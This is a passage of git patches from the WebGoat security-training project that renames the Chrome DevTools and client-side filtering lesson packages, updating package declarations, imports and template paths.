+++ b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkDummy.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.chrome_dev_tools;
+package org.owasp.webgoat.lessons.chromedevtools;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkLesson.java b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkLesson.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkLesson.java
rename to src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkLesson.java
index 3cc3b0230..ee7e87dcf 100644
--- a/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkLesson.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.chrome_dev_tools;
+package org.owasp.webgoat.lessons.chromedevtools;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment.adoc b/src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_Assignment.adoc
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment.adoc
rename to src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_Assignment.adoc
diff --git a/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment_Network.adoc b/src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_Assignment_Network.adoc
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment_Network.adoc
rename to src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_Assignment_Network.adoc
diff --git a/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_console.adoc b/src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_console.adoc
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_console.adoc
rename to src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_console.adoc
diff --git a/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_elements.adoc b/src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_elements.adoc
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_elements.adoc
rename to src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_elements.adoc
diff --git a/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_intro.adoc b/src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_intro.adoc
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_intro.adoc
rename to src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_intro.adoc
diff --git a/src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_sources.adoc b/src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_sources.adoc
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/documentation/ChromeDevTools_sources.adoc
rename to src/main/resources/lessons/chromedevtools/documentation/ChromeDevTools_sources.adoc
diff --git a/src/main/resources/lessons/chrome_dev_tools/html/ChromeDevTools.html b/src/main/resources/lessons/chromedevtools/html/ChromeDevTools.html
similarity index 79%
rename from src/main/resources/lessons/chrome_dev_tools/html/ChromeDevTools.html
rename to src/main/resources/lessons/chromedevtools/html/ChromeDevTools.html
index db4506fa0..c83603964 100644
--- a/src/main/resources/lessons/chrome_dev_tools/html/ChromeDevTools.html
+++ b/src/main/resources/lessons/chromedevtools/html/ChromeDevTools.html
@@ -4,22 +4,22 @@
 
 <!-- 1 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chromedevtools/documentation/ChromeDevTools_intro.adoc"></div>
 </div>
 
 <!-- 2 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_elements.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chromedevtools/documentation/ChromeDevTools_elements.adoc"></div>
 </div>
 
 <!-- 3 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_console.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chromedevtools/documentation/ChromeDevTools_console.adoc"></div>
 </div>
 
 <!-- 4 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chromedevtools/documentation/ChromeDevTools_Assignment.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -35,12 +35,12 @@
 
 <!-- 5 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_sources.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chromedevtools/documentation/ChromeDevTools_sources.adoc"></div>
 </div>
 
 <!-- 6 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/chrome_dev_tools/documentation/ChromeDevTools_Assignment_Network.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/chromedevtools/documentation/ChromeDevTools_Assignment_Network.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
diff --git a/src/main/resources/lessons/chrome_dev_tools/i18n/WebGoatLabels.properties b/src/main/resources/lessons/chromedevtools/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/chromedevtools/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Console_Clear.jpg b/src/main/resources/lessons/chromedevtools/images/ChromeDev_Console_Clear.jpg
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Console_Clear.jpg
rename to src/main/resources/lessons/chromedevtools/images/ChromeDev_Console_Clear.jpg
diff --git a/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Console_Ex.jpg b/src/main/resources/lessons/chromedevtools/images/ChromeDev_Console_Ex.jpg
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Console_Ex.jpg
rename to src/main/resources/lessons/chromedevtools/images/ChromeDev_Console_Ex.jpg
diff --git a/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Elements.jpg b/src/main/resources/lessons/chromedevtools/images/ChromeDev_Elements.jpg
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Elements.jpg
rename to src/main/resources/lessons/chromedevtools/images/ChromeDev_Elements.jpg
diff --git a/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Elements_CSS.jpg b/src/main/resources/lessons/chromedevtools/images/ChromeDev_Elements_CSS.jpg
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Elements_CSS.jpg
rename to src/main/resources/lessons/chromedevtools/images/ChromeDev_Elements_CSS.jpg
diff --git a/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Network.jpg b/src/main/resources/lessons/chromedevtools/images/ChromeDev_Network.jpg
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Network.jpg
rename to src/main/resources/lessons/chromedevtools/images/ChromeDev_Network.jpg
diff --git a/src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Sources.jpg b/src/main/resources/lessons/chromedevtools/images/ChromeDev_Sources.jpg
similarity index 100%
rename from src/main/resources/lessons/chrome_dev_tools/images/ChromeDev_Sources.jpg
rename to src/main/resources/lessons/chromedevtools/images/ChromeDev_Sources.jpg
diff --git a/src/test/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevToolsTest.java b/src/test/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevToolsTest.java
similarity index 93%
rename from src/test/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevToolsTest.java
rename to src/test/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevToolsTest.java
index aec51b02d..cf15eb3d4 100644
--- a/src/test/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevToolsTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevToolsTest.java
@@ -1,11 +1,11 @@
-package org.owasp.webgoat.lessons.chrome_dev_tools;
+package org.owasp.webgoat.lessons.chromedevtools;
 
 import org.hamcrest.Matchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.chrome_dev_tools.ChromeDevTools;
+import org.owasp.webgoat.lessons.chromedevtools.ChromeDevTools;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;

From 1c86f465dc7385227fb51a6a071f89eee790bc5b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 19:20:46 +0200
Subject: [PATCH 181/227] Renamed to clientsidefiltering

---
 .../ClientSideFiltering.java                        |   2 +-
 .../ClientSideFilteringAssignment.java              |   2 +-
 .../ClientSideFilteringFreeAssignment.java          |   2 +-
 .../Salaries.java                                   |   2 +-
 .../ShopEndpoint.java                               |   2 +-
 .../css/clientSideFiltering-stage1.css              |   0
 .../css/clientSideFilteringFree.css                 |   0
 .../ClientSideFiltering_assignment.adoc             |   0
 .../documentation/ClientSideFiltering_final.adoc    |   0
 .../documentation/ClientSideFiltering_plan.adoc     |   0
 .../html/ClientSideFiltering.html                   |   6 +++---
 .../i18n/WebGoatLabels.properties                   |   0
 .../images/lesson1_header.jpg                       | Bin
 .../images/lesson1_workspace.jpg                    | Bin
 .../images/samsung-black.jpg                        | Bin
 .../images/samsung-grey.jpg                         | Bin
 .../js/clientSideFiltering.js                       |   0
 .../js/clientSideFilteringFree.js                   |   0
 .../lessonSolutions/en/ClientSideFiltering.html     |   0
 .../clientside_firebug.jpg                          | Bin
 .../ClientSideFilteringAssignmentTest.java          |   6 +++---
 .../ClientSideFilteringFreeAssignmentTest.java      |   4 ++--
 .../ShopEndpointTest.java                           |   6 +++---
 23 files changed, 16 insertions(+), 16 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{client_side_filtering => clientsidefiltering}/ClientSideFiltering.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{client_side_filtering => clientsidefiltering}/ClientSideFilteringAssignment.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{client_side_filtering => clientsidefiltering}/ClientSideFilteringFreeAssignment.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{client_side_filtering => clientsidefiltering}/Salaries.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{client_side_filtering => clientsidefiltering}/ShopEndpoint.java (98%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/css/clientSideFiltering-stage1.css (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/css/clientSideFilteringFree.css (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/documentation/ClientSideFiltering_assignment.adoc (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/documentation/ClientSideFiltering_final.adoc (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/documentation/ClientSideFiltering_plan.adoc (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/html/ClientSideFiltering.html (95%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/images/lesson1_header.jpg (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/images/lesson1_workspace.jpg (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/images/samsung-black.jpg (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/images/samsung-grey.jpg (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/js/clientSideFiltering.js (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/js/clientSideFilteringFree.js (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/lessonSolutions/en/ClientSideFiltering.html (100%)
 rename src/main/resources/lessons/{client_side_filtering => clientsidefiltering}/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{client_side_filtering => clientsidefiltering}/ClientSideFilteringAssignmentTest.java (86%)
 rename src/test/java/org/owasp/webgoat/lessons/{client_side_filtering => clientsidefiltering}/ClientSideFilteringFreeAssignmentTest.java (93%)
 rename src/test/java/org/owasp/webgoat/lessons/{client_side_filtering => clientsidefiltering}/ShopEndpointTest.java (93%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFiltering.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFiltering.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFiltering.java
rename to src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFiltering.java
index a4648e772..219d29c52 100644
--- a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFiltering.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFiltering.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.client_side_filtering;
+package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignment.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignment.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignment.java
index c29390e6a..2347697d5 100644
--- a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.client_side_filtering;
+package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignment.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignment.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignment.java
index 8394a9738..aeb1ccb42 100644
--- a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.client_side_filtering;
+package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/Salaries.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java
rename to src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/Salaries.java
index 8ad86e647..0aa286103 100644
--- a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/Salaries.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/Salaries.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.client_side_filtering;
+package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.beans.factory.annotation.Value;
diff --git a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpoint.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpoint.java
rename to src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpoint.java
index 9e9bcf200..f56d203b1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpoint.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.client_side_filtering;
+package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import com.google.common.collect.Lists;
 import lombok.AllArgsConstructor;
diff --git a/src/main/resources/lessons/client_side_filtering/css/clientSideFiltering-stage1.css b/src/main/resources/lessons/clientsidefiltering/css/clientSideFiltering-stage1.css
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/css/clientSideFiltering-stage1.css
rename to src/main/resources/lessons/clientsidefiltering/css/clientSideFiltering-stage1.css
diff --git a/src/main/resources/lessons/client_side_filtering/css/clientSideFilteringFree.css b/src/main/resources/lessons/clientsidefiltering/css/clientSideFilteringFree.css
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/css/clientSideFilteringFree.css
rename to src/main/resources/lessons/clientsidefiltering/css/clientSideFilteringFree.css
diff --git a/src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_assignment.adoc b/src/main/resources/lessons/clientsidefiltering/documentation/ClientSideFiltering_assignment.adoc
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_assignment.adoc
rename to src/main/resources/lessons/clientsidefiltering/documentation/ClientSideFiltering_assignment.adoc
diff --git a/src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_final.adoc b/src/main/resources/lessons/clientsidefiltering/documentation/ClientSideFiltering_final.adoc
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_final.adoc
rename to src/main/resources/lessons/clientsidefiltering/documentation/ClientSideFiltering_final.adoc
diff --git a/src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_plan.adoc b/src/main/resources/lessons/clientsidefiltering/documentation/ClientSideFiltering_plan.adoc
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/documentation/ClientSideFiltering_plan.adoc
rename to src/main/resources/lessons/clientsidefiltering/documentation/ClientSideFiltering_plan.adoc
diff --git a/src/main/resources/lessons/client_side_filtering/html/ClientSideFiltering.html b/src/main/resources/lessons/clientsidefiltering/html/ClientSideFiltering.html
similarity index 95%
rename from src/main/resources/lessons/client_side_filtering/html/ClientSideFiltering.html
rename to src/main/resources/lessons/clientsidefiltering/html/ClientSideFiltering.html
index e9f3ec18e..18d965c66 100644
--- a/src/main/resources/lessons/client_side_filtering/html/ClientSideFiltering.html
+++ b/src/main/resources/lessons/clientsidefiltering/html/ClientSideFiltering.html
@@ -2,10 +2,10 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/client_side_filtering/documentation/ClientSideFiltering_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/clientsidefiltering/documentation/ClientSideFiltering_plan.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/client_side_filtering/documentation/ClientSideFiltering_assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/clientsidefiltering/documentation/ClientSideFiltering_assignment.adoc"></div>
 
     <br/>
 
@@ -74,7 +74,7 @@
     </div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/client_side_filtering/documentation/ClientSideFiltering_final.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/clientsidefiltering/documentation/ClientSideFiltering_final.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/clientSideFilteringFree.css}"/>
     <script th:src="@{/lesson_js/clientSideFilteringFree.js}" language="JavaScript"></script>
     <div class="attack-container">
diff --git a/src/main/resources/lessons/client_side_filtering/i18n/WebGoatLabels.properties b/src/main/resources/lessons/clientsidefiltering/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/clientsidefiltering/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/client_side_filtering/images/lesson1_header.jpg b/src/main/resources/lessons/clientsidefiltering/images/lesson1_header.jpg
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/images/lesson1_header.jpg
rename to src/main/resources/lessons/clientsidefiltering/images/lesson1_header.jpg
diff --git a/src/main/resources/lessons/client_side_filtering/images/lesson1_workspace.jpg b/src/main/resources/lessons/clientsidefiltering/images/lesson1_workspace.jpg
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/images/lesson1_workspace.jpg
rename to src/main/resources/lessons/clientsidefiltering/images/lesson1_workspace.jpg
diff --git a/src/main/resources/lessons/client_side_filtering/images/samsung-black.jpg b/src/main/resources/lessons/clientsidefiltering/images/samsung-black.jpg
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/images/samsung-black.jpg
rename to src/main/resources/lessons/clientsidefiltering/images/samsung-black.jpg
diff --git a/src/main/resources/lessons/client_side_filtering/images/samsung-grey.jpg b/src/main/resources/lessons/clientsidefiltering/images/samsung-grey.jpg
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/images/samsung-grey.jpg
rename to src/main/resources/lessons/clientsidefiltering/images/samsung-grey.jpg
diff --git a/src/main/resources/lessons/client_side_filtering/js/clientSideFiltering.js b/src/main/resources/lessons/clientsidefiltering/js/clientSideFiltering.js
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/js/clientSideFiltering.js
rename to src/main/resources/lessons/clientsidefiltering/js/clientSideFiltering.js
diff --git a/src/main/resources/lessons/client_side_filtering/js/clientSideFilteringFree.js b/src/main/resources/lessons/clientsidefiltering/js/clientSideFilteringFree.js
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/js/clientSideFilteringFree.js
rename to src/main/resources/lessons/clientsidefiltering/js/clientSideFilteringFree.js
diff --git a/src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering.html b/src/main/resources/lessons/clientsidefiltering/lessonSolutions/en/ClientSideFiltering.html
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering.html
rename to src/main/resources/lessons/clientsidefiltering/lessonSolutions/en/ClientSideFiltering.html
diff --git a/src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg b/src/main/resources/lessons/clientsidefiltering/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg
similarity index 100%
rename from src/main/resources/lessons/client_side_filtering/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg
rename to src/main/resources/lessons/clientsidefiltering/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg
diff --git a/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignmentTest.java
similarity index 86%
rename from src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignmentTest.java
index 0c1c70ee3..b041fac21 100644
--- a/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignmentTest.java
@@ -1,18 +1,18 @@
-package org.owasp.webgoat.lessons.client_side_filtering;
+package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.client_side_filtering.ClientSideFiltering;
+import org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFiltering;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.lessons.client_side_filtering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
+import static org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 
 /**
diff --git a/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignmentTest.java
similarity index 93%
rename from src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignmentTest.java
index a8314aa4c..4b67d534a 100644
--- a/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignmentTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.client_side_filtering;
+package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import org.hamcrest.CoreMatchers;
 import org.hamcrest.Matchers;
@@ -6,7 +6,7 @@ import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.client_side_filtering.ClientSideFiltering;
+import org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFiltering;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
diff --git a/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpointTest.java
similarity index 93%
rename from src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpointTest.java
rename to src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpointTest.java
index 0a8102337..0ac9cade0 100644
--- a/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpointTest.java
@@ -20,20 +20,20 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.client_side_filtering;
+package org.owasp.webgoat.lessons.clientsidefiltering;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.client_side_filtering.ShopEndpoint;
+import org.owasp.webgoat.lessons.clientsidefiltering.ShopEndpoint;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
 import static org.hamcrest.Matchers.is;
-import static org.owasp.webgoat.lessons.client_side_filtering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
+import static org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
